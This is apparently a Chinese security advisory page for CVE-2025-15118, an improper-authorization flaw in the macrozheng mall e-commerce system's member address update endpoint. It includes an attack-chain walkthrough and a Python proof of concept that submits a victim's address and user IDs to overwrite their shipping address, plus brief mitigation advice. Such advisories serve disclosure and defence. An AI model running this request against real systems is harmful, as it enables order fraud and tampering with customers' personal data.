CVE-2025-15118 CVSS 4.3 中危

CVE-2025-15118 macrozheng mall会员地址更新不当授权漏洞

披露日期: 2025-12-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15118

漏洞类型

不当授权

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

macrozheng mall

漏洞概述

CVE-2025-15118是macrozheng mall电商系统中存在的一个中等严重性安全漏洞。该漏洞被发现于2025年，影响版本至1.0.3。漏洞存在于会员端点的地址更新功能中（/member/address/update/），攻击者可以利用该漏洞在未经适当授权的情况下修改其他用户的收货地址信息。由于该漏洞的利用代码已公开，远程攻击者可以在低权限状态下无需用户交互即可发起攻击。虽然漏洞对机密性和完整性的影响评估为低，但仍然可能导致用户隐私信息泄露和订单数据篡改风险。

技术细节

该漏洞属于OWASP Top 10中的Broken Access Control（失效的访问控制）类别。攻击者通过操控member/address/update端点的请求参数，可以绕过正常的用户身份验证和授权检查。具体来说，系统未能正确验证当前登录用户与目标地址的归属关系，导致低权限用户能够修改不属于自己的收货地址。攻击者可能通过修改请求中的用户ID或地址ID参数来实现未授权访问。此类漏洞通常源于开发过程中对API端点访问控制逻辑的疏忽，缺少基于用户角色的权限校验机制。

攻击链分析

STEP 1

步骤1

攻击者注册并登录macrozheng mall系统，获取低权限用户会话令牌

STEP 2

步骤2

攻击者收集目标用户的地址ID信息（通过API枚举或社会工程学手段）

STEP 3

步骤3

攻击者构造恶意请求，修改/member/address/update端点中的目标地址ID和用户ID参数

STEP 4

步骤4

服务器未能正确验证请求者权限，直接执行地址更新操作

STEP 5

步骤5

攻击成功修改目标用户收货地址，可用于后续欺诈或隐私窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-15118 PoC - macrozheng mall Unauthorized Address Modification
# Target: /member/address/update endpoint

target_url = "http://target-server/mall-api/member/address/update"

# Attacker-controlled session (low-privilege user)
session = requests.Session()
session.headers.update({
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <attacker_token>'
})

# Malicious payload - modify victim's address without proper authorization
payload = {
    "id": <victim_address_id>,
    "userId": <victim_user_id>,  # Unauthorized user ID
    "name": "Attacker Name",
    "phone": "1234567890",
    "province": "Attacker Province",
    "city": "Attacker City",
    "region": "Attacker Region",
    "detailAddress": "Malicious Address"
}

response = session.post(target_url, json=payload)

if response.status_code == 200:
    print("[+] Address modification successful - Authorization bypass confirmed")
else:
    print("[-] Attack failed - Status:", response.status_code)

影响范围

macrozheng mall <= 1.0.3

防御指南

临时缓解措施

在修复补丁发布前，可通过API网关配置临时访问控制策略，限制/member/address/update端点的调用频率和来源IP，同时启用完整的请求审计日志记录，以便及时发现异常访问行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15118
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15118
3 Details https://www.cvedetails.com/cve/CVE-2025-15118/
4 VulDB https://vuldb.com/cve/CVE-2025-15118
5 Link https://github.com/Hwwg/cve/issues/31
6 Link https://vuldb.com/?ctiid.338496
7 Link https://vuldb.com/?id.338496
8 Link https://vuldb.com/?submit.711758

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表